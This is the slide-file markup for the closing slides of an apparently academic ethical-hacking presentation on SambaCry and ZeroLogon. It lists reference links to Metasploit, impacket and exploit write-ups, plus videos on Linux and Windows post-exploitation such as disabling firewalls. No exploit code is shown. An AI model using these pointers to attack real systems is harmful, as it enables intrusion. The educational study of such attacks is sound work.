            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://old-releases.ubuntu.com/releases/14.04.5/​</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=lGr7VUCBvOQ</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/samba/is_known_pipename.md</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://github.com/sshuttle/sshuttle</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://linuxize.com/post/etc-shadow-file/</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>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00"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4132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References</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Google Shape;856;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1019850"/>
            <a:ext cx="8520600" cy="318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00" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/SecureAuthCorp/impacket</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=GNnt6ZB2x5k</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://5h4d0wb0y.github.io/2017-06-25-stapler/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (writeup, got idea for using python to create bash shell)</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://medium.com/@lucideus/sambacry-rce-exploit-lucideus-research-3a3e5bd9e17c</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://itsfoss.com/ppa-guide/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> (sources.list and other versioning issues on old ubuntu systems)</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://nmap.org/nsedoc/scripts/smb-vuln-cve-2017-7494.html</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt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1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>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860" name="Shape 860"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861" name="Google Shape;861;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986575" y="972025"/>
            <a:ext cx="3578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THANKS!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="862" name="Google Shape;862;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3986575" y="1654825"/>
            <a:ext cx="4470900" cy="28140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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Youtube Link for 2 Exploits and Linux Post Exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=c5OLZ9g48io</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>iVid2 Link for 2 Exploits and Linux Post Exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="es" sz="700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://ivid2.np.edu.sg/media/EH+Assignment+%28SambaCry+%26+ZeroLogOn%29/1_wv17pm1e</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Youtube Link for Windows Post Exploits</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">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rPr lang="es" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=AfYuxOHCXHw</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=4QXvn5q-zNA</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>iVid2 Link for Windows Server Post Exploits</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://ivid2.np.edu.sg/media/EH%20Assignment%20Denying%20File%20Access%20Post%20Exploit/1_pqvpvqdb</a:t>
            </a:r>
            <a:endParaRPr sz="1100">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s" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://ivid2.np.edu.sg/media/EH%20Assignment%20Disabling%20Firewall%20Post%20Exploit/1_gpzufzhg</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="863" name="Google Shape;863;p101"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="-4531426" y="-117297"/>
            <a:ext cx="7324051" cy="5378088"/>
            <a:chOff x="238125" y="262775"/>
            <a:chExt cx="7092825" cy="5151425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="864" name="Google Shape;864;p101"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4565450" y="4835675"/>
              <a:ext cx="850200" cy="445800"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5848675" y="1425000"/>
              <a:ext cx="423525" cy="132575"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5941025" y="1557925"/>
              <a:ext cx="238825" cy="95175"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6009475" y="1680125"/>
              <a:ext cx="119425" cy="102525"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5753150" y="1286475"/>
              <a:ext cx="614575" cy="170775"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1997375" y="1099025"/>
              <a:ext cx="3593400" cy="4136275"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2271225" y="2928325"/>
              <a:ext cx="977575" cy="976000"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3957250" y="2998400"/>
              <a:ext cx="25" cy="25"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1" w="1">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:move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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3307675" y="2819750"/>
              <a:ext cx="697375" cy="688475"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2445675" y="3165225"/>
              <a:ext cx="592975" cy="501025"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="20041" w="23719">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3481225" y="3027000"/>
              <a:ext cx="333850" cy="275925"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="11037" w="13354">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="639325" y="2213475"/>
              <a:ext cx="444225" cy="442625"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="17705" w="17769">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1112175" y="2165725"/>
              <a:ext cx="313675" cy="310475"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="12419" w="12547">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="22087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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="234562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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="2482550"/>
              <a:ext cx="1028525" cy="39825"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1593" w="41141">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41140" y="1593"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="2621050"/>
              <a:ext cx="1028525" cy="39850"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1594"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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="275797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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="28949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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="3031825"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="3168750"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="3305675"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="344257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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="35795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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4310700" y="3716425"/>
              <a:ext cx="1028525" cy="39825"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1593" w="41141">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="1593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41140" y="1593"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2293525" y="2208700"/>
              <a:ext cx="1776800" cy="39825"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2293525" y="2345625"/>
              <a:ext cx="1776800" cy="39825"/>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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2293525" y="2482550"/>
              <a:ext cx="1776800" cy="39825"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1593" w="71072">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71071" y="1593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2293525" y="2621050"/>
              <a:ext cx="1195675" cy="39850"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1594" w="47827">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47827" y="1593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4430100" y="1931675"/>
              <a:ext cx="730800" cy="119450"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4778" w="29232">
                  <a:moveTo>
                    <a:pt x="1" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="4777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29232" y="4777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2817325" y="1931675"/>
              <a:ext cx="729200" cy="119450"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="4778" w="29168">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29167" y="4777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="628175" y="3272225"/>
              <a:ext cx="765825" cy="1550725"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="62029" w="30633">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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="972075" y="4366000"/>
              <a:ext cx="79625" cy="398050"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="15922" w="3185">
                  <a:moveTo>
                    <a:pt x="0" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="15922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3185" y="15922"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2436800" y="685075"/>
              <a:ext cx="213375" cy="214950"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8598" w="8535">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1"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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2791850" y="685075"/>
              <a:ext cx="213350" cy="214950"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8598" w="8534">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0"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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3146875" y="685075"/>
              <a:ext cx="213375" cy="214950"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="8598" w="8535">
                  <a:moveTo>
                    <a:pt x="1" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1"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01"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
